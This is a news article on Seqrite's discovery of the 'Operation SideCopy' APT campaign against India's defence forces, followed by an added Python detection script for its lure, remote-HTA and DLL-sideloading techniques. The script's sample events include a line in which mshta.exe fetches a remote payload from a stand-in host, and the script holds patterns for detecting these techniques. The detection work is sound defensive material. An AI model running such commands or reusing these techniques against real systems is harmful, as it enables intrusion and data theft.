SmartStateIndia

Seqrite uncovers APT ‘Operation SideCopy’ targeting India’s Defence Forces


Seqrite, the cybersecurity products and solutions brand of Quick Heal Technologies, has uncovered a new Advanced Persistent Threat (APT) campaign targeting India’s Defence Forces. Dubbed ‘Operation SideCopy’, the campaign was found to mislead the security community by copying Tactics, Techniques, and Procedures (TTPs) that point at the SideWinder APT group. However, researchers at Seqrite have found strong evidence that ‘Operation SideCopy’ has potential links with the Pakistan-backed Transparent Tribe group. This is a breakthrough discovery, making Seqrite the first cybersecurity brand to expose the real identity of these threat actors.

Following the discovery, Seqrite alerted the Government authorities so that precautionary measures could be taken. Researchers at Seqrite suspect that China could be leveraging Pakistan-based APT groups to intrude into Indian networks and gather intelligence that could benefit it in the ongoing India-China conflict. They further warned that these attacks put intelligence agencies at risk of losing sensitive information that could be leveraged by both neighbouring countries. This may happen directly, via data exfiltration, or indirectly, by compromising an individual and compelling them to share confidential data.

Active since early 2019, ‘Operation SideCopy’ has used infection vectors such as LNK files, template injection, and the Equation Editor vulnerability to target Indian defence forces. For command and control, it has used Contabo GmbH, the hosting provider most favoured by Transparent Tribe. According to Seqrite researchers, the malicious actors have been continuously developing malware modules and deploying updated versions after analysing the victim’s data and environment. Notably, the attackers even kept track of which of their malware was detected by a system’s antivirus and updated it immediately, so that no trace is left for further investigation.

Uncovering the attack

A couple of months ago, Seqrite’s next-generation behavioural detection technology alerted on a few processes running executable HTML files fetched from non-reputable websites. In addition, the researchers noticed that the offending processes had interesting names such as “Defence Production Policy 2020.docx.lnk”. Taken together, these factors triggered a deeper investigation. On probing further, Seqrite researchers found that these attacks were targeted at Indian defence units and individuals in the armed forces.

The attack starts with the victim receiving LNK files inside compressed ZIP/RAR archives via phishing emails. Since these files have realistic names and icons, as if they came directly from the Government of India, victims are likely to consider them authentic and be tricked into opening them.

Once opened, the malware runs in the system’s memory and gradually downloads and installs further components, eventually stealing user data and uploading it to attacker-controlled servers. The attack made use of the DLL sideloading technique (also known as the Black-White technique): a Microsoft-signed, legitimate system process (credwiz.exe) was used to run the malware by sideloading a malicious DLL. After infiltrating the victim’s machine, the malware immediately restarts the device to clear initial infection traces.
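The three observable behaviours described above (document-looking LNK lures such as “Defence Production Policy 2020.docx.lnk”, processes running executable HTML files from remote sites, and credwiz.exe sideloading a DLL) can each be turned into a simple endpoint detection check. The script below is an added example written for this article and is not Seqrite’s code or part of their report. It assumes a simplified telemetry format (dicts with `type`, `path`, `image`, `command_line` and `loaded` fields, modelled loosely on Sysmon-style file-create, process-create and image-load events), assumes that “executable HTML files” are launched through mshta.exe, and uses a constructed list of sample events; the trusted DLL directories and document extensions are also assumptions, not values from the article.

```python
import ntpath
import re
from typing import Dict, List, Tuple

# Document extensions the lure names imitate (assumed list, not from the article).
DOC_EXTENSIONS = {".doc", ".docx", ".pdf", ".xls", ".xlsx", ".ppt", ".pptx", ".txt"}

# Directories a signed Windows binary such as credwiz.exe is expected to load
# DLLs from (assumption; tune to your environment).
TRUSTED_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


def is_double_extension_lnk(filename: str) -> bool:
    """True for names like 'report.docx.lnk' that disguise a shortcut as a document."""
    base = ntpath.basename(filename).lower()
    if not base.endswith(".lnk"):
        return False
    stem = base[:-len(".lnk")]
    return any(stem.endswith(ext) for ext in DOC_EXTENSIONS)


def is_remote_hta_launch(event: Dict[str, str]) -> bool:
    """True when mshta.exe is started with a remote URL on its command line.
    Assumes the 'executable HTML files' in the article are run via mshta.exe."""
    if ntpath.basename(event.get("image", "")).lower() != "mshta.exe":
        return False
    return bool(REMOTE_URL.search(event.get("command_line", "")))


def is_suspicious_sideload(event: Dict[str, str]) -> bool:
    """True when a process named credwiz.exe loads a DLL from outside the
    trusted Windows directories, the pattern used for DLL sideloading."""
    if event.get("type") != "image_load":
        return False
    if ntpath.basename(event.get("image", "")).lower() != "credwiz.exe":
        return False
    dll = event.get("loaded", "").lower()
    return not dll.startswith(TRUSTED_DLL_DIRS)


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule_name, detail) for every event that matches one of the checks."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        kind = ev.get("type")
        if kind == "file_create" and is_double_extension_lnk(ev.get("path", "")):
            findings.append(("double_extension_lnk", ev["path"]))
        elif kind == "process_create" and is_remote_hta_launch(ev):
            findings.append(("remote_hta_launch", ev["command_line"]))
        elif kind == "image_load" and is_suspicious_sideload(ev):
            findings.append(("credwiz_sideload", ev["loaded"]))
    return findings


# Constructed sample telemetry: one benign and one suspicious event per check.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "file_create", "path": "C:\\Users\\analyst\\Downloads\\Defence Production Policy 2020.docx.lnk"},
    {"type": "file_create", "path": "C:\\Users\\analyst\\Desktop\\Budget 2020.xlsx"},
    {"type": "process_create", "image": "C:\\Windows\\System32\\mshta.exe",
     "command_line": "mshta.exe http://lure.example/stage1.hta"},
    {"type": "process_create", "image": "C:\\Windows\\System32\\notepad.exe",
     "command_line": "notepad.exe notes.txt"},
    {"type": "image_load", "image": "C:\\Windows\\System32\\credwiz.exe",
     "loaded": "C:\\Windows\\System32\\kernel32.dll"},
    {"type": "image_load", "image": "C:\\Users\\Public\\credwiz.exe",
     "loaded": "C:\\Users\\Public\\sideload.dll"},
]

if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Run on the constructed events it reports exactly three findings, one per technique; in practice the same checks would be fed from an EDR or Sysmon export, and the credwiz.exe rule generalises to any signed binary known to be abused for sideloading by changing the process name it matches.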

